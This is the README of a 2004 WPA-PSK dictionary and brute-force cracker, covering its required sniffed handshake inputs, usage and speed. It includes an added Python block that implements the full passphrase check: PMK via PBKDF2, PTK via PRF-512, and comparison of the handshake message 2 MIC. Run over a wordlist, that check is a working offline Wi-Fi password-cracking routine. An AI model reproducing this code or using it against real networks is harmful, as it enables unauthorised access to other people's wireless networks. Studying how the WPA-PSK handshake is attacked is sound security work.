WPA Cracker
=============================================

WPA Cracker was developed by Takehiro Takahashi

version 0.1 - public release
Oct 27, 2004

Email: mailto:gte360y@mail.gatech.edu?Subject=WPA_CRACKER
WWW: http://www.tinypeap.com

Disclaimer
----------
This code was intended to point out the vulnerability which resides
within one of the WPA specifications.
Hence, it is purely educational and the author does not take any
responsibility for whatever damage this software may have caused.


What is WPA Cracker
-------------------
WPA Cracker is a dictionary/brute-force attacker against WiFi Protected Access (WPA).
WPA takes two forms: WPA Enterprise Mode and WPA PSK (Pre-Shared Key) Mode.
WPA Cracker takes advantage of an inherently vulnerable characteristic of the
PSK implementation to give users an insight into why security must be
deployed properly.

Requirements
------------
The user must prepare the traffic dumps required for the password calculation.
WPA Cracker takes the ssid, anonce, snonce, host MAC address, AP MAC address,
and the traffic dump of the second step of the 4-way handshake as inputs to initiate the attack.
All the information stated above can be obtained through traffic sniffing
using tools like Ethereal. Essentially, the first two packets of the 4-way
handshake are needed to collect the required information. The exact calculation
that the attack performs on these inputs can be studied in the whitepaper found online.
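The derivation those inputs feed, as an added example that is not part of the tool's source: PBKDF2 turns passphrase and SSID into the PMK, PRF-512 over the sorted MACs and nonces yields the PTK, and the KCK (its first 16 bytes) must reproduce the MIC carried in handshake message 2, which is why only those two packets are needed. The MACs, nonces and message-2 frame below are constructed sample values; only the "password"/"IEEE" pair is the 802.11i Annex H PBKDF2 test vector.

```python
import hashlib
import hmac

# Constructed sample inputs (not from the original page): the SSID, the AP and
# station MACs, ANonce and SNonce that the README lists as the attack's inputs.
SSID = b"IEEE"                       # "IEEE"/"password" is the 802.11i Annex H test vector
AP_MAC = bytes.fromhex("a0a1a1a3a4a5")
STA_MAC = bytes.fromhex("b0b1b2b3b4b5")
ANONCE = bytes(range(0xE0, 0xE0 + 32))
SNONCE = bytes(range(0xC0, 0xC0 + 32))

def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # These 4096 iterations are the "thousands of hashings" that cap the cracker's speed.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3.
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # MACs and nonces are ordered Min||Max so both ends derive the same PTK.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # The MIC covers the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    # Key Info low 3 bits pick the algorithm: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1-128 (CCMP).
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    if frame[6] & 0x07 == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def passphrase_matches(candidate: str, ssid: bytes, aa: bytes, spa: bytes,
                       anonce: bytes, snonce: bytes, frame: bytes) -> bool:
    # KCK is the first 128 bits of the PTK; only the right PMK reproduces message 2's MIC.
    kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[81:97])

def build_message2(kck: bytes, snonce: bytes) -> bytes:
    # Constructed handshake message 2: 802.1X header, RSN descriptor (2), Key Info 0x010a
    # (version 2, pairwise, MIC set), key length 16, replay counter 1, SNonce, zero
    # IV/RSC/ID, MIC, empty key data. Built only so the check above has a frame to verify.
    body = b"\x02\x01\x0a\x00\x10" + (1).to_bytes(8, "big") + snonce + b"\x00" * 32
    frame = b"\x01\x03" + (len(body) + 18).to_bytes(2, "big") + body + b"\x00" * 18
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]
```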

Usage
-----
$ ./wpa_attack

WPA Cracker uses the Password Cracking Library (PCL) written by Pavel Semjanov.
Hence, the behavior of WPA Cracker (brute-forcing or dictionary attacking)
is determined by modifying the definition file, password.def.
The syntax of the definition file is very straightforward and
can be studied through the comments in the file.
Refer to sample.txt for sample inputs.

Performance
-----------
Test Environment: Pentium M 1400 MHz, 1024 MB RAM
Brute-Forcing: 18 passphrases per second
Dictionary Attacking: 16 passphrases per second

The author is aware of the cracker's poor performance.  :p
This is because the protocol requires thousands of hash iterations over
the inputs (which is a good thing). However, given a relatively simple passphrase,
the cracker will do its job in a reasonable amount of time.
